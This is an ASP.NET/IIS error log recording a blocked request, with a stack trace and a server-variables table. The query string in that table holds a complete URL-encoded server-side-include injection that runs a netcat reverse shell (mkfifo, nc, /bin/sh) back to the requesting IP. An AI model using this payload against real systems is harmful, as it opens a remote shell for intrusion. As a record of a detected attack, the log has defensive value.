System.Web.HttpRequestValidationException: A potentially dangerous Request.QueryString value was detected from the client (camnbr="<!--#exec cmd="mkfif...").
System.Web.HttpRequestValidationException (0x80004005): A potentially dangerous Request.QueryString value was detected from the client (camnbr="<!--#exec cmd="mkfif..."). at System.Web.HttpRequest.ValidateString(String value, String collectionKey, RequestValidationSource requestCollection) at System.Web.HttpRequest.ValidateHttpValueCollection(HttpValueCollection collection, RequestValidationSource requestCollection) at System.Web.HttpRequest.get_QueryString() at DevExpress.Web.BinaryStorageSubscriber.RequestRecipient(HttpRequest request, RequestEvent requestEvent) at DevExpress.Web.ASPxHttpHandlerModule.ProcessRequestCore(RequestEvent requestEvent) at DevExpress.Web.ASPxHttpHandlerModule.BeginRequestHandler(Object sender, EventArgs e) at System.Web.HttpApplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
Logged on Monday, September 25, 2023 at 8:56:03 AM
See also:
Server Variables
| Name | Value |
|---|---|
| ALL_HTTP | |
| ALL_RAW | |
| APPL_MD_PATH | /LM/W3SVC/1/ROOT |
| APPL_PHYSICAL_PATH | C:\inetpub\wwwroot\ |
| AUTH_PASSWORD | ***** |
| AUTH_TYPE | |
| AUTH_USER | |
| CERT_COOKIE | |
| CERT_FLAGS | |
| CERT_ISSUER | |
| CERT_KEYSIZE | |
| CERT_SECRETKEYSIZE | |
| CERT_SERIALNUMBER | |
| CERT_SERVER_ISSUER | |
| CERT_SERVER_SUBJECT | |
| CERT_SUBJECT | |
| CONTENT_LENGTH | 0 |
| CONTENT_TYPE | |
| GATEWAY_INTERFACE | CGI/1.1 |
| HTTPS | off |
| HTTPS_KEYSIZE | |
| HTTPS_SECRETKEYSIZE | |
| HTTPS_SERVER_ISSUER | |
| HTTPS_SERVER_SUBJECT | |
| INSTANCE_ID | 1 |
| INSTANCE_META_PATH | /LM/W3SVC/1 |
| LOCAL_ADDR | 10.3.1.4 |
| LOGON_USER | |
| PATH_INFO | /incl/image_test.shtml |
| PATH_TRANSLATED | C:\inetpub\wwwroot\incl\image_test.shtml |
| QUERY_STRING | camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2031.220.1.83%208%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e |
| REMOTE_ADDR | 31.220.1.83 |
| REMOTE_HOST | 31.220.1.83 |
| REMOTE_PORT | 47280 |
| REMOTE_USER | |
| REQUEST_METHOD | GET |
| SCRIPT_NAME | /incl/image_test.shtml |
| SERVER_NAME | 10.3.1.4 |
| SERVER_PORT | 80 |
| SERVER_PORT_SECURE | 0 |
| SERVER_PROTOCOL | HTTP/1.0 |
| SERVER_SOFTWARE | Microsoft-IIS/10.0 |
| URL | /incl/image_test.shtml |